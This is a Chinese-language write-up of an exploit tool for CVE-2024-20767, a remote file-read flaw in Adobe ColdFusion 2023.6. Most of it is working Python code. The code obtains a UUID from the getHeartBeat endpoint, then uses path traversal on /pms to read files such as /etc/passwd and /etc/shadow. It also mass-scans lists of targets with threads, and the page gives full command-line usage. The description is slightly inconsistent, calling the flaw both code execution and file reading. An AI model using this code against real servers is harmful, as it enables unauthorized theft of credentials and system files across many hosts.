本文详细分析Adobe ColdFusion 2023.6版本中的CVE-2024-20767远程文件读取漏洞,提供完整的Python利用代码,支持单目标攻击和批量扫描,可读取系统敏感文件如/etc/passwd等。
Adobe ColdFusion 2023.6远程文件读取漏洞
漏洞信息
- 风险等级: 高
- 本地利用: 否
- 远程利用: 是
- CVE编号: CVE-2024-20767
- CWE分类: CWE-284(不恰当的访问控制)
漏洞描述
ColdFusion 2023(LUcee)存在远程代码执行漏洞,攻击者可以利用该漏洞远程读取服务器上的敏感文件。
利用要求
- requests>=2.25.0
- urllib3>=1.26.0
使用方法
1
|
python3 CVE-2024-20767.py -u http://target.com -f /etc/passwd
|
技术实现
核心类:ColdFusionExploit
初始化配置
1
2
3
4
5
|
def __init__(self, output_file=None, port=8500):
self.output_file = output_file
self.port = port
self.verbose = True
self.session = requests.Session()
|
UUID获取
通过访问/CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat端点获取UUID:
1
2
3
4
5
6
7
8
9
10
11
12
|
def get_uuid(self, url):
endpoint = "/CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat"
try:
response = self.session.get(f"{url}{endpoint}", verify=False, timeout=10)
if response.status_code == 200:
match = re.search(r"<var name='uuid'><string>(.+?)</string></var>", response.text)
if match:
uuid = match.group(1)
return uuid
except Exception as e:
pass
return None
|
文件读取功能
利用路径遍历漏洞读取文件:
1
2
3
4
5
6
7
8
9
10
|
def read_file(self, url, uuid, file_path):
headers = {"uuid": uuid}
endpoint = f"/pms?module=logging&file_name=../../../../../../../{file_path}&number_of_lines=100"
try:
response = self.session.get(f"{url}{endpoint}", verify=False, headers=headers, timeout=10)
if response.status_code == 200 and response.text.strip() != "[]":
return response.text
except:
pass
return None
|
系统文件检测
自动检测常见系统文件:
1
2
3
4
5
6
7
8
9
10
11
12
|
def test_files(self, url, uuid):
files = {
"Linux": ["etc/passwd", "etc/shadow", "etc/hosts"],
"Windows": ["Windows/win.ini", "Windows/System32/drivers/etc/hosts", "boot.ini"]
}
for os_name, file_list in files.items():
for file_path in file_list:
content = self.read_file(url, uuid, file_path)
if content:
return True
return False
|
批量扫描功能
支持多线程批量扫描:
1
2
3
4
5
6
7
8
9
10
11
12
|
def scan_file(self, target_file, threads):
with open(target_file, "r") as f:
urls = [line.strip() for line in f if line.strip() and not line.startswith('#')]
with ThreadPoolExecutor(max_workers=threads) as executor:
futures = {executor.submit(self.exploit, url): url for url in urls}
for future in as_completed(futures):
url = futures[future]
try:
future.result()
except Exception as e:
pass
|
命令行参数
-u/--url: 目标URL-f/--file: 包含目标URL的文件-p/--port: 端口号(默认8500)-c/--custom: 自定义要读取的文件-o/--output: 输出文件-t/--threads: 线程数(默认20)-q/--quiet: 静默模式
该漏洞利用工具提供了完整的远程文件读取能力,支持单目标和批量扫描,是网络安全测试中的重要工具。